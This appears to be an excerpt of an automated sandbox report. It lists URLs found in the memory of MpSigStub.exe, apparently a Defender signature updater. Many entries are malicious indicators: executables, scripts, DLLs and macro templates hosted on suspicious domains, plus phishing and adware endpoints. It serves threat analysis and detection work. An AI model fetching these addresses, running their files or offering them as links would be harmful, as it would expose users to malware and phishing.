Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://gosgd.com
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://gosgd2.com
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://gpt.alarmasystems.ru/wp-content/upgrade/obi.html
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://granitmdp.com/rechnung-nr-06197/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://greenertrack.info/.well-known/acme-challenge/hp.gf
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://greenthdykegheedahatakankeadeshnaathfgh.ydns.eu/office360/regasm.exe
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://greentreee.com/src/gate.php?a
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://gridinsoft.com/check_ver.php?product=chmeditor&ver=
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://grizzli-counter.com/id120/index.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.bluechipstaffing.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.chromaimagen.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.couturefloor.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.ddoborguild.com/0n1ine.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.dondyablo.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.echowin.com/autorizz0.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.globaltcms.com/autorizz0.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.hamiltoncustomhomesinc.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.securitiessupportunit.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.securityguardlisting.com/setup.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://gveejlsffxmfjlswjmfm.com/files/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://gx3bxpo.sed.digitalmusictutorials.com
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://gyeuiojndhbvmaoiwnnchauwo28vnj8mjmvnwhk.ydns.eu/document.doc
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://h1m2en.ddns.net/sa98as8f7/kk/1445785485
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://hackbox.f3322.org:808/Consys21.dll
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://handjobheats.com/xgi-bin/q.php
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://hao.360.cn
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://hao.360.cn/?src=lm&
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://hao.360.cnx
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://happy-fxs.com/sms/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://harpa.space/kgodu.dot
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://hasvideo.net?t=
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://hellos.tcp4.me/standard-bank-online-relief-funds-ucount-onlinebanking.standardbank.co.za-dire
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://helpefy.com/002/777/new%20outlook/new%20outlook/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://helpservice09.hol.es
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://hem1.passagen.se/fylke/
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://hgastation.com
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://hi.ru/?44
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://highnmightytv.com/orderss182doc.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://highnmightytv.com/wp-content/themes/data.php
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://highpay.website/css/windows.jar
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://hikangaroo5.com/images/xjs7s/gb40f_eygecpdogfzeca1xtg/ruryf1?sxps=vddxqzhm_&oof=xptbdzfnuzvdt
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://hiltrox.com
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://hiodus.bounceme.net/nations/history.html/f
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://hit1.marinalvapn.com/silage.zip
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://ho.io/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://hollywoodnailspa.net/auth/tb/tb/index.html)
Source: MpSigStub.exe, 00000026.00000003.18351149084.00000138BD6B0000.00000004.00000001.sdmp	String found in binary or memory: http://hombresvalientesposadas.com/zek/reportdhlnew2.php
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://home.zh-cn.cc/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://hookbase.com/Index.htm
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://host87.net
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://hostserver.kr
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://hostthenpost.org/uploads/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://hotbar.com
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://hotedeals.co.uk/ekck095032/
Source: MpSigStub.exe, 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp	String found in binary or memory: http://houusha33.icu/jquery/jquery.php
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://hqdating.net
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://hqsextube08.com/getsoft/task.php?v=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://html.hjsm.tom.com/?mod=book&act=anonsearch&key=%s
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://htmlcss.3322.org/sub/ray.js
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://httpswindowsupdates.com/apkssl230459.exe
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://httpz.ru
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://hyoeyeep.ws/template.doc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://hytechmart.com
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	String found in binary or memory: http://i.compucrush.com/i.php
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://i.compucrush.com/i.phpxD
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://i.imgur.com/
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://i.omeljs.info/omel/javascript.js?appTitle=PennyBee&channel=chkomel
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://i.sfu.edu.ph/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://i.ttd7.cn/getsoft
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://iaa.1eko.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://ianlunn.co.uk
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://ibm.dmcast.com/t.rar
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://icanhazip.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://icloudstorage.moonfruit.com/?preview=y
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://idc.9e3.com/web/hao123/hack.swfwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://idea-secure-login.com/3/ddg.dll5
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://idmnfs.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://ie.search.psn.cn/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://iefeadsl.com/feat/
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://iframe.ip138.com/ic.asp
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://ilya-popov.ru/wp-content/uploads/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://image.soso.com/image.cgi?w=%s
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://images-saver.pw/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://images.google.cn/images?q=%s
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://imd.gdyiping.com
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://img-save.xyz
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://img.zhongsou.com/i?w=%s
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://imp.fusioninstall.com/impression.do/?event=installer_start&referrer=x
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://imp.mymapsxp.com/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://imp.theweathercenter.co/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://impex.maaraj.com/images/total_visitas.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://incredicole.com/wp-content/themes/elegant-grunge/images/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://indonesiacyberteam.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://inent17alexe.rr
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://infolokercpns.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://inform.3utilities.com/lib64/index.html/f
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://ingridzinnel.com/invoices-attached/
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://init.crash-analysis.com
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://init.icloud-analysis.com
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://init.icloud-diagnostics.com
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://injectsorals.com/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://inline477.info/fsrv
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://ins.pricejs.net/dealdo/install-report
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://ins.pricejs.net/dealdo/install-report?type=install
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://ins.quickinstallpack.com/?action=
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://ins.rdxrp.com/stats/
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://insf.quickinstallpack.com/?action=
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://insightout-me.com/backup/excellview.php
Source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp	String found in binary or memory: http://install.outbrowse.com/logTrack.php?x
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://install.xxxtoolbar.com/download_straight.html
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://install.xxxtoolbar.com/ist/scripts/prompt.php?
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://installdream.com/download/blankNet2.dat
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://installer.mediapassplugin.com/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://installmp3codec.info/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://installs.hotbar.com/installs/hotbar/programs/
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://instamailserver.link/finito.ps1
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://instituitartetculture.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://instituthypnos.com/maps1316/ki_d/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://int.dpool.sina.com.cn/iplookup/iplookup.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://interface.kokmobi.com/newservice
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://interstat.eux
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://investmenteducationkungykmtsdy8agender.duckdns.org/office/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://iopsctlvzs.com/riu-hmgzhkjut/ymxggj-wnk_wpiohjhik/koptwt/xtz--r-gou--h_wktgzno-.php?
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://ios-certificate-update.com
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://ios-update-whatsapp.com
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://ip-score.com/checkip/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://ip.158166.com/zcb2009/ie7-0day.htmwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://ip.aq138.com/setip.asp
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://ippp.co.zw/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://ismailiyamedical.com/ds/151120.gif
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://istanbulyilbasimekanlari.com/tracking-number-
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://istart.webssearches.com/?type=sc
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://isvbr.net
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://iy6h86i.sed.tiresnwheels4fun.com
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://iz.orda.icu/webiz.php
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://j.pricejs.net/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://jL.chura.pl/rc/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://jaculus.ru/902b3449e3e8/interbase/counteract/neat/luxurious/relate/jjibwjhi.dot
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://jaklaw.co/wp-includes/js/plupload/db/view/
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://japanesecosplaygirl.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://jaqvicmy.ru/count7.php
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://java-se.com/o.js
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://java.sun.com/products/autodl/j2se
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://javafx.com
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://javascriptobfuscator.com
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://jay6.tech/wp-content/themes/twentynineteen/template-parts/cont
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://jjjjjkl.pe.hu/doc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://jmmgroup.ae/213.doc
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: http://jmmgroup.ae/coo.exe
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://jobylive2.w22.haohaohost.cn/c/abbx/qqpost.asp
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://joelosteel.gdn/eml/put.php
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://johnnyslandscaping.org/over.php
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://joxi.ru/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://jquerystatistics.org/update.js
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: http://jqueryui.com
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://js.k0102.com/ad
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://js.mykings.pw:280/v.sctscrobj.dll
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://jugnitv.com/final.jpg
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://juiillosks.sytes.net/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://jump.qq.com/clienturl_100?clientuin=
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://jump.qq.com/clienturl_15
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://juntec.es/rechnung-18561/
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://justgaytgp.net/rd/out.php
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://jxmienphi.net/update/
Source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp	String found in binary or memory: http://jxvh.com/goto.php
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://jyhjyy.top
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://kapper.st/info.txt
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://karab.hopto.org/sarg.dot
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://karadyma.com/dhlpack/kfqakff/)
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://karafetdoll.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://kavok.ind.br/ds/2312.gif
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://keeppure.cn/tool/xxz.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://kemra.co.ke/bbaoh/
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://keramikadecor.com.ua/bdfg/excelzz/index.php
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://keratomir.biz/get.php?partner=
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://khaleejposts.com/rgk/m_rs/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://king.connectioncdn.
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://king.lionsheart.square7.ch/99.exe
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://king.lionsheart.square7.ch/wrk.exe
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://kishi73.com.br/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://kit.mastacash.com/
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://kle.austries
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://kokovs.cc/porno/stat.php
